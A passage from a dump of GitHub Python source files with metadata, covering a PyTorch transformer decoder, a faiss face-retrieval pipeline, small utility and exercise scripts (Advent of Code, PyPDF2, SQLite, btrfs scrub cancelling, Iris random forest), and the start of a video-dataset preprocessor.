super(Decoder, self).__init__()\n self.layers = nn.ModuleList(layers)\n self.norm = norm_layer\n\n def forward(self, x, cross, x_mask=None, cross_mask=None):\n for layer in self.layers:\n x = layer(x, cross, x_mask=x_mask, cross_mask=cross_mask)\n\n if self.norm is not None:\n x = self.norm(x)\n\n return x\n\nclass TransformerDecoder(nn.Module):\n\n def __init__(self, decoder_layer, num_layers, norm=None, return_intermediate=False):\n super().__init__()\n self.layers = _get_clones(decoder_layer, num_layers)\n self.num_layers = num_layers\n self.norm = norm\n self.return_intermediate = return_intermediate\n\n def forward(self, tgt, memory,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None,\n query_pos: Optional[Tensor] = None):\n output = tgt\n T,B,C = memory.shape\n intermediate = []\n\n for n,layer in enumerate(self.layers):\n \n residual=True\n output,ws = layer(output, memory, tgt_mask=tgt_mask,\n memory_mask=memory_mask,\n tgt_key_padding_mask=tgt_key_padding_mask,\n memory_key_padding_mask=memory_key_padding_mask,\n pos=pos, query_pos=query_pos,residual=residual)\n\n if self.return_intermediate:\n intermediate.append(self.norm(output))\n if self.norm is not None:\n output = self.norm(output)\n if self.return_intermediate:\n intermediate.pop()\n intermediate.append(output)\n\n if self.return_intermediate:\n return torch.stack(intermediate)\n return output\n\n\n\nclass TransformerDecoderLayer(nn.Module):\n\n def __init__(self, d_model, nhead, dim_feedforward=64, dropout=0.1,\n activation=\"relu\", normalize_before=False):\n super().__init__()\n self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout)\n self.multihead_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout)\n # Implementation of Feedforward model\n self.linear1 = nn.Linear(d_model, dim_feedforward)\n self.dropout = nn.Dropout(dropout)\n self.linear2 = nn.Linear(dim_feedforward, d_model)\n\n self.norm1 = nn.LayerNorm(d_model)\n self.norm2 = nn.LayerNorm(d_model)\n self.norm3 = nn.LayerNorm(d_model)\n self.dropout1 = nn.Dropout(dropout)\n self.dropout2 = nn.Dropout(dropout)\n self.dropout3 = nn.Dropout(dropout)\n\n self.activation = _get_activation_fn(activation)\n self.normalize_before = normalize_before\n def with_pos_embed(self, tensor, pos: Optional[Tensor]):\n return tensor if pos is None else tensor + pos\n\n def forward_post(self, tgt, memory,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None, \n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None,\n query_pos: Optional[Tensor] = None,\n residual=True):\n q = k = self.with_pos_embed(tgt, query_pos)\n tgt2,ws = self.self_attn(q, k, value=tgt, attn_mask=tgt_mask,\n key_padding_mask=tgt_key_padding_mask)\n tgt = self.norm1(tgt)\n tgt2,ws = self.multihead_attn(query=self.with_pos_embed(tgt, query_pos),\n key=self.with_pos_embed(memory, pos),\n value=memory, attn_mask=memory_mask,\n key_padding_mask=memory_key_padding_mask)\n\n\n # attn_weights [B,NUM_Q,T]\n tgt = tgt + self.dropout2(tgt2)\n tgt = self.norm2(tgt)\n tgt2 = self.linear2(self.dropout(self.activation(self.linear1(tgt))))\n tgt = tgt + self.dropout3(tgt2)\n tgt = self.norm3(tgt)\n return tgt,ws\n\n def forward_pre(self, tgt, memory,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: 
Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None,\n query_pos: Optional[Tensor] = None):\n\n \n # q = k = self.with_pos_embed(tgt2, query_pos)\n # # # print(q.size(), k.size(), tgt2.size())\n # tgt2,ws = self.self_attn(q, k, value=tgt2, attn_mask=tgt_mask,\n # key_padding_mask=tgt_key_padding_mask)\n # tgt = tgt + self.dropout1(tgt2)\n # print('1', tgt.size(), memory.size())\n # sssss\n # tgt2 = self.norm2(tgt)\n # print(self.with_pos_embed(tgt2, query_pos).size(), self.with_pos_embed(memory, pos).size())\n memory = memory.permute(2,0,1).contiguous()\n # print(memory.size())\n # memory_mask = self._generate_square_subsequent_mask(memory.size(0),tgt2.size(0))\n # memory_mask = memory_mask.cuda()\n # print(memory_mask.size())\n # print(tgt2.size(),memory.size())\n # attn_output_weights = torch.bmm(tgt2,memory.transpose(1, 2))\n # print(attn_output_weights.size())\n # sss\n tgt2,attn_weights = self.multihead_attn(query=self.with_pos_embed(tgt, query_pos),\n key=self.with_pos_embed(memory, pos),\n value=memory, attn_mask=memory_mask,\n key_padding_mask=memory_key_padding_mask)\n tgt2 = self.norm1(tgt2)\n # # print(tgt2.size(), memory.size()) \n # tgt2,attn_weights = self.multihead_attn(query=self.with_pos_embed(tgt2, query_pos),\n # key=self.with_pos_embed(memory, pos),\n # value=memory, attn_mask=memory_mask,\n # key_padding_mask=memory_key_padding_mask)\n # # print(tgt2.size())\n # # sss\n tgt2 = tgt + self.dropout2(tgt2)\n # # # print('2', tgt.size())\n # tgt2 = self.norm3(tgt)\n tgt2 = self.linear2(self.dropout(self.activation(self.linear1(tgt2))))\n # # print(tgt2.size())\n # # tgt = tgt + self.dropout3(tgt2)\n # # print()\n # print(attn_weights.size())\n # ssss\n return tgt2, attn_weights\n\n def forward(self, tgt, memory,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None,\n query_pos: Optional[Tensor] = None,\n residual=True):\n if self.normalize_before:\n return self.forward_pre(tgt, memory, tgt_mask, memory_mask,\n tgt_key_padding_mask, memory_key_padding_mask, pos, query_pos)\n return self.forward_post(tgt, memory, tgt_mask, memory_mask,\n tgt_key_padding_mask, memory_key_padding_mask, pos, query_pos,residual)\n\n def _generate_square_subsequent_mask(self, ls, sz):\n mask = (torch.triu(torch.ones(ls, sz)) == 1).transpose(0, 1)\n mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))\n return mask\n\n\ndef _get_clones(module, N):\n return nn.ModuleList([copy.deepcopy(module) for i in range(N)])\n\n\n\ndef _get_activation_fn(activation):\n \"\"\"Return an activation function given a string\"\"\"\n if activation == \"relu\":\n return F.relu\n if activation == \"gelu\":\n return F.gelu\n if activation == \"glu\":\n return F.glu\n raise RuntimeError(F\"activation should be relu/gelu, not {activation}.\")","repo_name":"xmed-lab/SAHC","sub_path":"decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":10817,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"33057965957","text":"import numpy as np\n\nfrom retrieval.register import Map, Collector, Canvas, parse_feature\nfrom util.multi_process import MultiprocessingQueue, MultiprocessingDictQueue\nfrom util.arguments import get_args_for_all_object_structurization\nfrom util.pipeline import Pipeline\nfrom 
main_pipeline.main_pipeline import MainPipeline\n\n\nclass AllObjectStructurization:\n def __init__(self, display):\n self.display = display\n self.index_little = None\n self.index_large = None\n self.idx2face_little = None\n self.face_register_pipeline = None\n self.idx2face_large = Map(multi_flag=True)\n self.queue_obj = MultiprocessingQueue()\n self.args = get_args_for_all_object_structurization()\n self.infer_result_queue_by_channel = MultiprocessingDictQueue(\n self.args.main_pipeline_channel_count)\n self.stream_bbox_queue_by_channel = MultiprocessingDictQueue(\n self.args.main_pipeline_channel_count)\n self.main()\n\n def get_index(self):\n import faiss\n from retrieval.feature_retrieval import Searcher\n\n d = self.args.index_vector_dimension # vector dims\n quantizer = faiss.IndexFlatL2(d)\n\n self.index_little = Searcher(\n mode=\"normal_flat\",\n device_id=self.args.index_little_device_ids,\n quantizer=quantizer,\n d=d,\n nlist=self.args.index_cluster_count)\n self.index_large = Searcher(mode=\"ivf_sq\",\n device_id=self.args.index_large_device_ids,\n quantizer=quantizer,\n d=d,\n nlist=self.args.index_cluster_count)\n\n try:\n self.index_little.load(self.args.index_loading_path_little)\n self.idx2face_little = Map(self.args.idx2face_name_map_path)\n except NotADirectoryError:\n self.create_little_index()\n\n try:\n self.index_large.load(self.args.index_loading_path_large)\n except NotADirectoryError:\n self.create_large_index()\n\n def create_little_index(self):\n self.idx2face_little = Map()\n self.register_faces()\n self.index_little.save(self.args.index_loading_path_little)\n self.idx2face_little.save(self.args.idx2face_name_map_path)\n\n def create_large_index(self):\n np.random.seed(1234)\n xb = np.random.random(\n (self.args.index_base_size,\n self.args.index_vector_dimension)).astype('float32')\n self.index_large.train(xb)\n self.index_large.save(self.args.index_loading_path_large)\n\n def register_faces(self):\n self.face_register_pipeline = Pipeline(\n pipeline_cfg_file=self.args.face_feature_pipeline_path,\n stream_name=self.args.face_feature_pipeline_name,\n in_plugin_id=0)\n canvas_width, canvas_height = self.args.canvas_size\n collection = Collector(self.args.face_root_path, \"face\")\n canvas = Canvas(canvas_height, canvas_width)\n idx = 0\n for key, path in collection:\n print(f\"{key}: {path}\")\n enlarged_img = canvas(path, binary=True)\n ret = self.face_register_pipeline.infer(image_bin=enlarged_img)\n if ret:\n vector = parse_feature(ret)\n if vector:\n mtx = np.asarray(vector, dtype=np.float32)[np.newaxis, :]\n self.index_little.add(mtx, idx)\n self.idx2face_little[str(idx)] = key\n idx += 1\n\n def main(self):\n if not self.args.main_pipeline_only:\n self.get_index()\n\n main_pipeline = MainPipeline(self.args, self.queue_obj, self.stream_bbox_queue_by_channel)\n feature_retrieval = RegisterAndRetrive(self.args, self.index_little,\n self.index_large,\n self.idx2face_little,\n self.idx2face_large,\n self.queue_obj,\n self.infer_result_queue_by_channel)\n display = self.display(self.args, self.infer_result_queue_by_channel, self.stream_bbox_queue_by_channel)\n\n try:\n main_pipeline.start()\n display.start()\n feature_retrieval.run()\n except KeyboardInterrupt:\n if main_pipeline.is_alive():\n main_pipeline.kill()\n if display.is_alive():\n display.kill()\n print(\"Stop AllObjectsStructuring successfully.\")\n\n\nclass RegisterAndRetrive:\n def __init__(self, args, index_little, index_large, idx2face_little,\n idx2face_large, queue_obj, queue_display):\n 
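# Worker that consumes detected objects from queue_obj, registers face\n        # features in the large index, matches them against the little (gallery)\n        # index, and forwards results to the per-channel display queue (see run).\n        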
self.args = args\n self.index_little = index_little\n self.index_large = index_large\n self.idx2face_little = idx2face_little\n self.idx2face_large = idx2face_large\n self.queue_obj = queue_obj\n self.queue_display = queue_display\n\n def run(self):\n while True:\n obj_dict = self.queue_obj.get()\n channel_id = obj_dict.get(\"channel_id\")\n if not isinstance(channel_id, int):\n raise IOError(\"Channel Id not found.\")\n\n if self.args.main_pipeline_only or \\\n obj_dict.get(\"object_name\") != \"face\":\n self.queue_display.put(obj_dict, channel_id)\n continue\n\n feat_vec = obj_dict.get(\"feature_vector\")\n feat_vec = np.asarray(feat_vec, dtype=np.float32)[np.newaxis, :]\n obj_idx = obj_dict.get(\"object_index\")\n\n # Todo 序号需要转换成字符吗\n idx_large = self.index_large.add(feat_vec)\n self.idx2face_large[idx_large] = obj_idx\n\n distance, indexes = self.index_little.search(\n feat_vec, self.args.index_topk)\n idx_little = str(indexes[0][0])\n retrieved_key = self.idx2face_little[idx_little]\n obj_dict[\"retrieved_key\"] = retrieved_key\n self.queue_display.put(obj_dict, channel_id)\n","repo_name":"Ascend/mindxsdk-referenceapps","sub_path":"mxVision/AllObjectsStructuring/util/main_entry.py","file_name":"main_entry.py","file_ext":"py","file_size_in_byte":6214,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12601901492","text":"f = open(\"./input.txt\")\n\n\ndef serialize(x, y):\n return f'{x}:{y}'\n\n\ndef serialize_steps(x, y, steps):\n return f'{x}:{y}:{steps}'\n\n\nwire1 = f.readline().strip().split(\",\")\nwire2 = f.readline().strip().split(\",\")\n\n\ndef draw_path(wire):\n x = 0\n y = 0\n path = set()\n step_map = {}\n steps = 0\n\n for instruction in wire:\n direction = instruction[0]\n distance = int(instruction[1:])\n for i in range(1, distance + 1):\n steps += 1\n if direction == 'U':\n y += 1\n if direction == 'D':\n y -= 1\n if direction == 'L':\n x -= 1\n if direction == 'R':\n x += 1\n serialized = serialize(x, y)\n if serialized not in path:\n path.add(serialized)\n step_map[serialized] = steps\n\n return path, step_map\n\n\n(wire1_path, wire1_steps) = draw_path(wire1)\n(wire2_path, wire2_steps) = draw_path(wire2)\n\n# p1\nintersections = wire1_path.intersection(wire2_path)\nintersection_coords = [intersection.split(\n \":\") for intersection in intersections]\nintersection_distances = [abs(int(x)) + abs(int(y))\n for x, y in intersection_coords]\nprint(min(intersection_distances))\n\n# p2\ntotal_intersection_steps = [wire1_steps[intersection] +\n wire2_steps[intersection] for intersection in intersections]\nprint(min(total_intersection_steps))\n","repo_name":"spiderbites/advent-of-code-2019","sub_path":"d3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34050535790","text":"from src.utils.spark_factory import get_spark\r\nfrom src import *\r\nimport urllib.parse\r\n\r\n_spark=get_spark()\r\n\r\ndef staging2storage(landing_script, hist_table, buss_date):\r\n\r\n logger.info(\"Load Landing from {0} to ods.{1} started.\".format(landing_script, hist_table))\r\n sql_path = SQL_STORAGE_PATH\r\n\r\n with open(sql_path + landing_script) as fr:\r\n file_content = fr.read()\r\n\r\n query = file_content % (STAGING_SCHEMA)\r\n if buss_date != '0':\r\n query += \" AND BUSS_DATE = '{}' \".format(buss_date)\r\n\r\n logger.error(query)\r\n\r\n df_sql = _spark.sql(query)\r\n 
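# Register the staged rows as a temp view named after the target table so\r\n    # the INSERT OVERWRITE below can SELECT from it.\r\n    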
df_sql.createOrReplaceTempView('{0}'.format(hist_table))\r\n\r\n\r\n    logger.info(\"Writing to Storage...\")\r\n    table_list_hist = _spark.sql(\"show tables in {0}\".format(HIST_SCHEMA))\r\n    table_name_hist = table_list_hist.filter(table_list_hist.tableName == \"{0}\".format(hist_table)) \\\r\n        .filter(table_list_hist.isTemporary == \"false\").collect()\r\n    if len(table_name_hist) > 0:\r\n        _spark.sql(\"SET hive.exec.dynamic.partition.mode = nonstrict\")\r\n        _spark.sql('''\r\n            INSERT OVERWRITE TABLE {0}.{1} partition(buss_date)\r\n            SELECT * FROM {1}\r\n            '''.format(HIST_SCHEMA, hist_table))\r\n    else:\r\n        logger.error(\"Table does not exist\")\r\n\r\n\r\n    logger.info(\"Write data to {0}.{1} finished.\".format(HIST_SCHEMA, hist_table))\r\n\r\n\r\n\r\n\r\n","repo_name":"helsaprimadiana/read-mongo-to-hive","sub_path":"src/feature/staging2storage.py","file_name":"staging2storage.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"18784150856","text":"import sqlite3\n\nsqlite_file='data_49002.sqlite'\ntable_name='holder'\nnew_field1='outlet1'\nnew_field2='outlet2'\nnew_field3='outlet3'\nnew_field4='outlet4'\nfield_type='INTEGER'\n\nconn=sqlite3.connect(sqlite_file)\nc=conn.cursor()\n\nc.execute('CREATE TABLE {tn} ({nf1} {ft})'\\\n    .format(tn=table_name, nf1=new_field1, ft=field_type))\n\nc.execute(\"ALTER TABLE {tn} ADD COLUMN '{nf2}' {ft}\"\\\n    .format(tn=table_name, nf2=new_field2, ft=field_type))\n\nc.execute(\"ALTER TABLE {tn} ADD COLUMN '{nf3}' {ft}\"\\\n    .format(tn=table_name, nf3=new_field3, ft=field_type))\n\nc.execute(\"ALTER TABLE {tn} ADD COLUMN '{nf4}' {ft}\"\\\n    .format(tn=table_name, nf4=new_field4, ft=field_type))\n\nconn.commit()\nconn.close()\n","repo_name":"SirMrShyGuy/Capstone-Project","sub_path":"Database/sqlite_table_setup.py","file_name":"sqlite_table_setup.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"163720599","text":"from tests_common.pytest_bdd import (\n    given,\n)\n\nfrom mail.devpack.lib.components.sharpei import SharpeiCloud\n\n\n@given(\"cloud sharpei is started\")\ndef step_cloud_sharpei_is_started(context):\n    context.iam_server.reset()\n    context.yc_server.reset()\n    context.coord.components[SharpeiCloud].restart()\n    context.sharpei_api = context.coord.components[SharpeiCloud].api()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"mail/tests/integration/steps/cloud_steps.py","file_name":"cloud_steps.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"26628508367","text":"## Import\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\n\n## Create the PdfFileReader instance and create a new PDF file using PdfFileWriter\nold_pdf = PdfFileReader(open(\"lorem.pdf\", \"rb\"))\nnew_pdf = PdfFileWriter()\n\n## Loop through the pages and add them to the new PDF file\nfor page in old_pdf.pages[1:4]: # pages[1:4] selects indices 1 to 3, i.e. the 2nd to 4th pages\n    new_pdf.addPage(page)\n\n## Save the new PDF file\nwith open(\"new_lorem_pdf.pdf\", \"wb\") as f:\n    new_pdf.write(f)\n\n","repo_name":"giridhar7632/working-with-pdf-demo","sub_path":"04_extract_text_to_pdf.py","file_name":"04_extract_text_to_pdf.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"26400920826","text":"# 
Purpose: random forest classification of the Iris dataset\n\"\"\"\nRandom forests are applied to both regression and classification, most often classification. A random forest trains many decision trees on samples of the data and combines their votes to classify and predict.\nWhile classifying the data it can also score the importance of each variable, i.e. estimate how much each variable contributes to the classification.\n\"\"\"\n\"\"\"\nBuilding a random forest:\n1. Use the bootstrap method to draw n samples with replacement from the original training set and grow one decision tree per sample.\n2. Assuming the training data has m features, choose the best feature at every split; each tree keeps splitting until all training examples at a node belong to the same class.\n3. Let every decision tree grow as large as possible without any pruning.\n4. Combine the resulting classification trees into the forest and use it to classify or regress on new data: for classification the trees vote on the final label, for regression the final prediction is the mean of the trees' outputs.\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.datasets import load_iris\n\nRF = RandomForestClassifier()\niris = load_iris()\nX = iris.data[:, :2] # keep only the first two feature columns\nY = iris.target\nRF.fit(X, Y)\n# meshgrid builds the two grid matrices\nh = .02\nx_min, x_max = X[:, 0].min() - .5, X[:, 0].max() + .5\ny_min, y_max = X[:, 1].min() - .5, X[:, 1].max() + .5\nxx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))\n\n# pcolormesh draws the grid matrices xx, yy and the corresponding predictions Z\nZ = RF.predict(np.c_[xx.ravel(), yy.ravel()])\nZ = Z.reshape(xx.shape)\nplt.figure(1, figsize=(8,6))\nplt.pcolormesh(xx, yy, Z, shading='auto',cmap=plt.cm.Paired)\n\n# scatter plot of the samples\nplt.scatter(X[:50,0], X[:50,1], color='red',marker='o', label='setosa')\nplt.scatter(X[50:100,0], X[50:100,1], color='blue', marker='x', label='versicolor')\nplt.scatter(X[100:,0], X[100:,1], color='green', marker='s', label='Virginica')\n\nplt.xlabel('Sepal length')\nplt.ylabel('Sepal width')\nplt.xlim(xx.min(), xx.max())\nplt.ylim(yy.min(), yy.max())\nplt.xticks(())\nplt.yticks(())\nplt.legend(loc=2)\nplt.title('RandomForestClassifier')\nplt.show()","repo_name":"Nanxia77/ml_work","sub_path":"鸢尾花数据集算法比较/Random Forest.py","file_name":"Random Forest.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"38505180987","text":"#! 
/usr/bin/env python3\ntry:\n\timport psutil\nexcept ImportError:\n\tprint(\"can't import psutil, you don't have this installed\")\n\texit(0)\n\t\nimport subprocess, shlex #standard library, should be able to import without problem\n\ntry:\n\tfor process in psutil.process_iter():\n\t\tcommand = process.cmdline()\n\t\tif len(command) == 4 and command[0] == \"btrfs\" and command[1] == \"scrub\" and command[2] in [\"start\", \"resume\"]:\n\t\t\tcancelCommand = f\"btrfs scrub cancel {command[3]}\"\n\t\t\tprint(f\"execute '{cancelCommand}'\")\n\t\t\ttry:\n\t\t\t\tsubprocess.run(shlex.split(cancelCommand), timeout=60, check=True)\n\t\t\t\tprint(\"success\")\n\t\t\texcept subprocess.TimeoutExpired:\n\t\t\t\tprint(\"Failed to cancel scrub (command timeout)\")\n\t\t\texcept subprocess.CalledProcessError as error:\n\t\t\t\tprint(f\"Failed to cancel scrub (status code {error.returncode})\")\n\t\t\texcept Exception:\n\t\t\t\tprint(\"Failed to cancel scrub (unknown failure)\")\nexcept Exception:\n\tprint(\"error happened, graceful exit\")\n\texit(0)\n","repo_name":"axzxc1236/btrfs-auto-cancel-scrub","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"20731667814","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# #### Lab4 \n# #### Data Structures and Algorithms\n# #### Maira usman \n# #### 21B-011-SE \n\n# In[8]:\n\n\nfrom matplotlib import pyplot as plt \nimport numpy as np \ndef version1(n):\n    totalSum = 0 \n    matrix= np.random.randint(10, size=(n, n)) \n    rowSum=[0]*n\n    counter=3\n    for i in range(0,n): \n        rowSum[i] = 0 \n        counter+=1 \n        for j in range(0, n ) : \n            rowSum[i] = rowSum[i] + matrix[i,j] \n            totalSum = totalSum + matrix[i,j] \n            counter+=2\n    return counter \ndef version2(n): \n    matrix= np.random.randint(10, size=(n, n)) \n    totalSum = 0 \n    rowSum=[0]*n\n    counter=3 # Counts the number of statements executed, excluding the counter updates \n    for i in range(0,n,1): \n        rowSum[i] = 0 \n        counter+=1 \n        for j in range(0, n ) : \n            rowSum[i] = rowSum[i] + matrix[i,j] \n            counter+=1 \n        totalSum = totalSum + rowSum[i] \n        counter+=1 \n    return counter \ndef simulation(n): \n    steps_version1=[0]*n \n    steps_version2 = [0] * n \n    for i in range(0,n): \n        steps_version1[i]=version1(i) \n        steps_version2[i]=version2(i) \n    x=list(range(n)) \n    plt.plot(x,steps_version2) \n    plt.plot(x, steps_version1) \n    plt.grid(which='both') \n    plt.xlabel(f'Input Size({n})')\n    plt.ylabel('Number of Steps') \n    plt.legend(['version2','version1']) \n    plt.show() \nsimulation(50)\nsimulation(120)\nsimulation(200)\n\n\n# In[1]:\n\n\nfrom timeit import Timer \nimport matplotlib.pyplot as plt \ndef concatenation(): \n    l = [] \n    for i in range(1000):\n        l = l + [i] \ndef append(): \n    l = [] \n    for i in range(1000): \n        l.append(i) \ndef comprehension(): \n    l = [i for i in range(1000)] \ndef rangeFunction(): \n    l = list(range(1000)) \nt1 = Timer(\"concatenation()\", \"from __main__ import concatenation\") \nconcatTime = t1.timeit(number=1000) \nprint(\"concatenation \", concatTime , \"seconds\") \nt2 = Timer(\"append()\", \"from __main__ import append\") \nappendTime = t2.timeit(number=1000) \nprint(\"append \", appendTime , \"seconds\") \nt3 = Timer(\"comprehension()\", \"from __main__ import comprehension\")\ncompTime= t3.timeit(number=1000)\nprint(\"comprehension \", compTime , \"seconds\") \nt4 = Timer(\"rangeFunction()\", \"from __main__ import 
rangeFunction\")\nrangeTime = t4.timeit(number=1000) \nprint(\"list range \",rangeTime , \"milliseconds\") \n\nfig = plt.figure() \nax = fig.add_axes([0,0,1,1]) \nlangs = ['concatination', 'append', 'comprehension', 'Range'] \nstudents = [concatTime ,appendTime ,compTime ,rangeTime] \nax.bar(langs,students) \nplt.show() \n\n\n# In[27]:\n\n\ndef ex1(n):\n count=0\n for i in range(n):\n count+=1\n return count\ndef ex2(n):\n count=0\n for i in range(n):\n count+=1\n for j in range(n):\n count+=1\n return count\ndef ex3(n):\n count=0\n for i in range(n):\n for j in range(n):\n count+=1\n return count\ndef ex4(n):\n count=0\n for i in range(n):\n for j in range(10):\n count+=1\n return count\ndef ex5(n):\n count=0\n for i in range(n):\n for j in range(i+1):\n count+=1\n return count\ndef ex6( n ):\n count = 0\n i = n\n while i >= 1 :\n count += 1\n i = i // 2\n return count\ndef ex7(n):\n count=0\n for i in range(n):\n count+=ex6(n)\n return count\ndef simulation(n): \n steps_version1=[0]*n \n steps_version2 = [0] * n \n steps_version3 = [0] * n\n steps_version4 = [0] * n\n steps_version5 = [0] * n\n steps_version6 = [0] * n\n steps_version7 = [0] * n\n for i in range(0,n): \n steps_version1[i]=ex1(i) \n steps_version2[i]=ex2(i) \n steps_version3[i]=ex3(i) \n steps_version4[i]=ex4(i) \n steps_version5[i]=ex5(i) \n steps_version6[i]=ex6(i)\n steps_version7[i]=ex7(i) \n x=list(range(n)) \n plt.plot(x,steps_version7) \n plt.plot(x,steps_version6) \n plt.plot(x,steps_version5) \n plt.plot(x,steps_version4) \n plt.plot(x,steps_version3) \n plt.plot(x,steps_version2) \n plt.plot(x,steps_version1) \n plt.grid(which='both') \n plt.xlabel(f'Input Size({n})')\n plt.ylabel('Number of Steps') \n plt.legend(['version7','version6','version5','version4','version3','version2','version1']) \n plt.show() \nsimulation(20)\n\n\n# In[23]:\n\n\nimport random\ncount=0\nlst=[i for i in range(1000)]\n\nprint(\"shuffledlist element 50 : \", lst.index(50))\ncase=[]\nfor i in range(50):\n random.shuffle(lst)\n case.append(lst.index(50)) \nprint(\"best case: \",min(case))\nprint(\"worst case: \",min(case))\nprint(\"average case: \",sum(case)//len(case)) \n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Myrausman/Data-Structures-and-ALgorithms","sub_path":"labs/Dsa lab4 .py","file_name":"Dsa lab4 .py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15562655370","text":"import imageio\r\nimport cv2\r\nimport numpy as np\r\nimport os\r\nimport pickle\r\nimport re\r\nimport torch\r\nfrom torch.utils.data import Dataset, DataLoader\r\nfrom skimage.transform import resize\r\nfrom PIL import Image\r\n#from scipy.misc.pilutil import imresize\r\nfrom torch.autograd import Variable\r\n\r\nimport argparse\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torch.autograd import Variable\r\nfrom matplotlib import pyplot as plt\r\nimport argparse\r\nimport os\r\n\r\nCATEGORIES = [\r\n \"boxing\",\r\n \"handclapping\",\r\n \"handwaving\",\r\n \"jogging\",\r\n \"running\",\r\n \"walking\"\r\n]\r\n\r\n# Dataset are divided according to the instruction at:\r\n# http://www.nada.kth.se/cvap/actions/00sequences.txt\r\nTraining_ID = [11, 12, 13, 14, 15, 16, 17, 18]\r\nTesting_ID = [19, 20, 21, 23, 24, 25, 1, 4]\r\nValidation_ID = [22, 2, 3, 5, 6, 7, 8, 9, 10]\r\n\r\ndef raw_dataset(dataset=\"train\"):\r\n if dataset == \"train\":\r\n ID = Training_ID\r\n elif dataset == \"test\":\r\n ID = Testing_ID\r\n else:\r\n ID = Validation_ID\r\n\r\n frames_index = 
parsing_sequence_file()\r\n\r\n data = []\r\n\r\n for category in CATEGORIES:\r\n # Get all files in current category's folder.\r\n folder_path = os.path.join(\"..\", \"dataset\", category)\r\n filenames = sorted(os.listdir(folder_path))\r\n\r\n for filename in filenames:\r\n filepath = os.path.join(\"..\", \"dataset\", category, filename)\r\n\r\n # Get id of person in this video.\r\n person_id = int(filename.split(\"_\")[0][6:])\r\n if person_id not in ID:\r\n continue\r\n\r\n vid = imageio.get_reader(filepath, \"ffmpeg\")\r\n\r\n frames = []\r\n\r\n # Add each frame to correct list.\r\n for i, frame in enumerate(vid):\r\n # Boolean flag to check if current frame contains human.\r\n ok = False\r\n for seg in frames_index[filename]:\r\n if i >= seg[0] and i <= seg[1]:\r\n ok = True\r\n break\r\n if not ok:\r\n continue\r\n\r\n # Convert to grayscale.\r\n frame = Image.fromarray(np.array(frame))\r\n frame = frame.convert(\"L\")\r\n frame = np.array(frame.getdata(),dtype=np.uint8).reshape((120, 160))\r\n frame = resize(frame, (60, 80))\r\n \r\n frames.append(frame)\r\n \r\n data.append({\r\n \"filename\": filename,\r\n \"category\": category,\r\n \"frames\": frames \r\n })\r\n print(data)\r\n pickle.dump(data, open(\"data/%s.p\" % dataset, \"wb\"))\r\n \r\ndef optflow_dataset(dataset=\"train\"):\r\n if dataset == \"train\":\r\n ID = Training_ID\r\n elif dataset == \"test\":\r\n ID = Testing_ID\r\n else:\r\n ID = Validation_ID\r\n\r\n # Setup parameters for optical flow.\r\n farneback_params = dict(\r\n winsize=20, iterations=1,\r\n flags=cv2.OPTFLOW_FARNEBACK_GAUSSIAN, levels=1,\r\n pyr_scale=0.5, poly_n=5, poly_sigma=1.1, flow=None)\r\n\r\n frames_index = parsing_sequence_file()\r\n\r\n data = []\r\n\r\n for category in CATEGORIES:\r\n # Get all files in current category's folder.\r\n folder_path = os.path.join(\"..\", \"dataset\", category)\r\n filenames = sorted(os.listdir(folder_path))\r\n\r\n for filename in filenames:\r\n filepath = os.path.join(\"..\", \"dataset\", category, filename)\r\n\r\n # Get id of person in this video.\r\n person_id = int(filename.split(\"_\")[0][6:])\r\n if person_id not in ID:\r\n continue\r\n\r\n vid = imageio.get_reader(filepath, \"ffmpeg\")\r\n\r\n flow_x = []\r\n flow_y = []\r\n\r\n prev_frame = None\r\n # Add each frame to correct list.\r\n for i, frame in enumerate(vid):\r\n # Boolean flag to check if current frame contains human.\r\n ok = False\r\n for seg in 